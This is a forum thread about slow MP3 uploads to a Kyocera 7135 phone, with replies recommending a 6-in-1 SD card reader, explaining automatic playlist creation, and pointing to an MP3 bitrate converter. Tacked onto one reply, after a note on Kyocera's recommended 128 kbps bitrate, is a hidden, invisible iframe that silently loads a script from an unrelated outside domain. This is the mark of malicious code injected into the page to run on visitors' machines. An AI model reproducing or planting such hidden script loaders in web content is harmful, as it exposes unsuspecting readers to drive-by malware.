MP3 upload to 7135 is SLOW, SLOW, SLOW.

Hi all,
I've had my 7135 about a week now, and I like it quite a bit, replacing a Motorola V60c and a Handspring Visor Platinum with this one unit.
I've added a 64Mb memory card for backups and MP3's. I like to listen to Cnet's Radio Direct ( what's left of their tech radio) which consists of daily automatic downloads of an 8-15Mb mp3 file of tech news.
At my normal morning sync I'd like to transfer one or two (if I missed a day) of these shows into my 7135, but I don't have the time. Putting 25Mb of Mp3's ( two shows ) can take most of half an hour, perhaps more. It's like the data transfer is happening at 20Kbps or so, even though I'm using the USB cable on the cradle. Really pathetic speeds for USB.

I can transfer the same MP3's directly to the card using a card reader in about 30 seconds, but without the playlist my 7135 can't play them.

Am I doing something wrong? I've looked, and I can't find any way to speed this process up. My normal syncs don't seem to take particularly long, even when Avantgo has a bunch of new pages or I'm adding programs.

Is there an alternative? can I create the playlist by hand and then upload it and the MP3's to my unit? Would anyone with software experience like to make a program to do this?

Any suggestions would be welcome.

Thanks,

Airmon

Try a 6 in 1 USB Media reader, the speed is AMAZING. It should take just 1 minute to download an entire album to the 7135.
Since so many devices use different style Media cards I would recommend a 6/1 reader over a cruzer if you're into digital photog or digital video, so you don't have to keep buying different ones.

Check out the Smartdisk USB 6/1 reader at: http://www.pricegrabber.com/search_...&search=6IN1USB about $25-30 dollars. It's solidly built and smaller than the picture makes it look.

Note: some of the newer cameras now use even newer smaller media called XD media (about the size of an SD card). If you're going to be in the market for a camera using "XD" media do a search for a 6/1 reader that includes "XD" as the one above does the other 6 type cards except XD.

Are you sure that the 7135 can't play MP3's that were loaded to the phone using another interface? I was considering getting an external SD-card reader for the same reason.

External reader works.... Remember to put your mp3s in the audio folder of the SD card.

Card reader - already have one, sorta.

I have a Minolta Dimage X camera and I can use that as a card reader/writer. You're right, file transfer using this method is nice and quick.
OK, I didn't try this method before in this way. After some experimentation with editing the playlist myself with notepad ( crashed the MP3 player and I had to soft reset the phone) I figured out how to do this. Really simple. Too simple, I guess .

Store the MP3 files in the "audio" folder on the card, clearing out any previous playlist files in that folder. Put the card in the phone. Start the MP3 player, and switch to the mode that lists the available MP3's. The software will automatically make a playlist and display the MP3's.
Whenever you change the contents of the audio folder ( adding or removing MP3's) you need to delete the playlist which will force the phone to create a new, updated one.

Pretty easy now, I just didn't try that method before. I left the old playlist in the folder previously and files either still showed after they were gone or didn't appear once they were there.

Thanks.

Hmmm. Wrong again

OK, I was wrong about the playlist thing. It'll create a new playlist each time. You don't have to delete it. My bad.

It's as simple as everyone else suggested, just copy the MP3 files. D'oh!

Oh, well. At least I have an easy solution...

thanks again.

No, thank YOU and everyone who helped straighten this out. I can buy the reader now to speed up the process.

Well, five days and $27 later, I have one of those 6-in-1 flash readers that X026092 recommended, and I have to concur. The speed is astounding, especially compared to these cards in their native devices.

For example, the speed to download six photos from my camera's Compact Flash card: 2 minutes in the camera, 2 seconds in the 6-in-1.

Speed to upload MP3's to the SD card is also very impressive.

Here's the one I got:

Does anybody know of a good inline mp3 bitrate converter?
Mine still skip at 128.
Would like to just convert the ones that are on there down to 96 or something lower so they don't skip.
Not the hardware either, 5 different phones in last 4 months.

Also, anybody tried the 32x SD cards and notice better playing/launcher loading?

Thanks,
-Will

Muchas again.

Try this one. It's a little quirky, but does the trick.

Awesome!

Looks like it converted them.
And inline too!
Also normalized the volume of all of them!
SWEET!
Much thanks.

I will try and see if 96 is low enough durning my next meeting.

What inline converter did you use. It seems to have been removed. I have ripped all my CDs at 190 and I don't want to start over again.

Kyocera recommend all MP3s (and PDB from MP3's) to be ripped at 128KBPS. If not they might not work or may skip.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I can't post the MP3 converter. It's too big 747KB. Try this link http://www.mp3workshop.net/ , if it is still up. If you can' t get it, reply here and I'll email or put it on my web page.
